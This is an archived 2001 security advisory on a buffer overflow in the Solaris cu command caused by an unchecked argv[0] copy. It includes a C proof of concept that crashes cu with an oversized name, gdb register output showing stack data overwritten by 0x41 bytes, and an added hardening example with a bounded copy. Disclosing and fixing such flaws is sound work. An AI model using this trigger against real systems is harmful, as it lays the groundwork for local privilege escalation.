From: Pablo Sor (psorAFIP.GOV.AR)
Date: Wed Jan 17 2001 - 13:34:52 CST


    Description

    The /usr/bin/cu command contains a buffer overflow. The problem occurs
    when it copies its own name (argv[0]) into an internal variable without
    checking its length, and this causes the overflow.

    Vulnerable Versions

    Sun Solaris 2.4
    Sun Solaris 2.5
    Sun Solaris 2.5.1
    Sun Solaris 2.6
    Sun Solaris 2.7

    (Don't know about Solaris 2.8)

    Technical Description

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>

    /* Build an argv[0] of the requested length (all 'A' bytes) and exec cu with it. */
    int main(int argc, char **argv)
    {
        char *buf;
        int len;

        if (argc != 2 || (len = atoi(argv[1])) < 1) {
            fprintf(stderr, "usage: %s <argv0-length>\n", argv[0]);
            return 1;
        }
        buf = (char *) malloc(len * sizeof(char));
        memset(buf, 0x41, len - 1);     /* fill with 'A' (0x41) */
        buf[len - 1] = 0;               /* NUL-terminate */
        execl("/usr/bin/cu", buf, (char *) 0);
        perror("execl");                /* only reached if the exec fails */
        return 1;
    }

    $ uname -a
    SunOS tomy 5.5.1 Generic_103640-34 sun4m sparc SUNW,SPARCstation-5

    $ ./cu-demo 4000
    Segmentation Fault (core dumped)

    $ gdb ./cu-demo --core=core

    GNU gdb 4.17
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB. Type "show warranty" for details.
    This GDB was configured as "sparc-sun-solaris2.5.1"...
    warning: core file may not match specified executable file.
    Core was generated by `AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'.
    Program terminated with signal 11, Segmentation Fault.
    #0 0xef62901c in ?? ()
    (gdb) info registers
    g0 0x0 0
    g1 0xef628d24 -278754012
    g2 0x0 0
    g3 0x0 0
    g4 0x0 0
    g5 0x0 0
    g6 0x0 0
    g7 0x0 0
    o0 0x137a4 79780
    o1 0xef792a88 -277271928
    o2 0x0 0
    o3 0x0 0
    o4 0x0 0
    o5 0xef792a88 -277271928
    sp 0xefffecb0 -268440400
    o7 0x31b48 203592
    l0 0x7efefeff 2130640639
    l1 0x81010100 -2130640640
    l2 0xff000000 -16777216
    l3 0xff0000 16711680
    l4 0xff00 65280
    l5 0x81010100 -2130640640
    l6 0x7 7
    l7 0xef7927d4 -277272620
    i0 0x39000 233472
    i1 0xeffffec4 -268435772
    i2 0x38088 229512
    i3 0x41414141 1094795585
    i4 0x2f 47
    i5 0x0 0
    fp 0xefffecf0 -268440336
    i7 0x137a4 79780
    y 0x0 0
    psr 0x4400086 71303302
    wim 0x0 0
    tbr 0x0 0
    pc 0xef62901c -278753252
    npc 0xef628ffc -278753284
    fpsr 0x0 0
    cpsr 0x0 0

    Pablo Sor
    psorafip.gov.ar
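An added illustration of the unchecked argv[0] copy the post describes, beside a bounded alternative. This is example code, not cu's source; the buffer size PROGNAME_BUF and the function names are assumptions, since the post does not give cu's internals.

```c
#include <stdio.h>
#include <string.h>

/* Hypothetical size of the internal name buffer; the post does not give cu's. */
#define PROGNAME_BUF 32

/* The unsafe pattern the post describes: strcpy(progname, argv[0]) with no
 * length check. argv[0] is chosen by whoever calls exec(), so its length is
 * attacker-controlled. To stay runnable the copy is done only when it fits;
 * a return value of 1 means a real strcpy() would have written past progname. */
int unchecked_copy_overflows(const char *argv0)
{
    char progname[PROGNAME_BUF];
    if (strlen(argv0) + 1 > sizeof progname)
        return 1;                 /* strcpy would run off the end of progname[] */
    strcpy(progname, argv0);      /* reached only after the size check */
    return 0;
}

/* Hardened form: bounded copy that always NUL-terminates and reports
 * truncation, so an over-long argv[0] can be rejected or logged instead of
 * silently corrupting the stack. Returns 0 on success, -1 if it did not fit. */
int copy_progname_bounded(char *dst, size_t dstsz, const char *argv0)
{
    int n = snprintf(dst, dstsz, "%s", argv0);
    return (n < 0 || (size_t)n >= dstsz) ? -1 : 0;
}

/* Builds an argv[0] of 'len' bytes of 'A', like the post's cu-demo does. */
static int make_name(char *out, size_t outsz, size_t len)
{
    if (len == 0 || len >= outsz) return -1;
    memset(out, 'A', len);
    out[len] = '\0';
    return 0;
}

/* 1 if an all-'A' argv[0] of 'len' bytes overflows the unchecked copy, else 0. */
int name_of_length_overflows(size_t len)
{
    char name[4096];
    return make_name(name, sizeof name, len) == 0 ? unchecked_copy_overflows(name) : -1;
}

/* 1 if the bounded copy accepts an all-'A' argv[0] of 'len' bytes, else 0. */
int name_of_length_fits_bounded(size_t len)
{
    char name[4096], dst[PROGNAME_BUF];
    if (make_name(name, sizeof name, len) != 0) return -1;
    return copy_progname_bounded(dst, sizeof dst, name) == 0;
}
```

With the post's 4000-byte name, the unchecked copy overflows while the bounded copy reports the truncation and leaves the stack intact.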